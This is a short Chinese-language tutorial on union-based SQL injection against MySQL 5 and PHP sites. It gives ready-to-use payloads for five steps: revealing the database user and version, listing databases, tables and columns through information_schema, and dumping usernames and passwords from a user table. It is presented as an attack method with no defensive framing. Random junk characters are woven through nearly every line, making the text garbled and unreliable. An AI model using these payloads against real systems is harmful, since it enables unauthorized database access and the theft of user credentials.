7 U" V% ~# X% `7 `; _$ R% R _
教程内容:Mysql 5+php 注入! }0 K3 F7 z/ a& t- b
* f3 D n$ u9 l7 o1 p; Z9 A" N# N1 P: u3 z p7 X
+ h+ S, ^) O6 }
一.查看MYSQL基本信息(库名,版本,用户)
" z: R3 u+ ^& u. {! ^9 F. q9 i" S. |1 }4 E
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*/ _# D7 X" ]2 X" h2 J) G6 c( ]
! y1 N. L' v3 c8 e
二.查数据库, J2 Y9 |% j s# v5 z
" i- X# x: |1 }
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
4 b& a: O o$ C1 v mlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。- R. i7 u' m9 i5 b1 N/ l
3 B5 t/ F1 S+ k4 a
三.暴表% M" C% I) N5 y0 o
4 x2 s' \" y1 k, m+ J. o/ m) pand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*% W) i C! K6 e$ e8 c: \8 n
: L, E ?6 q4 x. ?# T w
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
* C7 ^8 ~# q! b" H$ f
0 _- ]; y0 {; A6 t% b8 g四.暴字段9 b( D: d2 [5 o/ M1 c j
( Q" H5 o- p0 u; `+ nand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*2 I% V2 l0 j6 w
I+ d* y" k1 i: i# i2 m* h$ S
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
4 ~( w5 E; P% w4 m' S# a9 X2 u5 \5 ]7 d
五.暴数据
9 j' U* Q L% z. Z' x6 B3 ?! g/ Q( [ k- b* d
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*, G) |$ i$ c* |
# E6 O/ `9 s$ B& q- j8 t" i* i
" `& Q/ \2 u- ^/ v6 s/ }# h
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。/ y5 Y2 W H7 z# x
|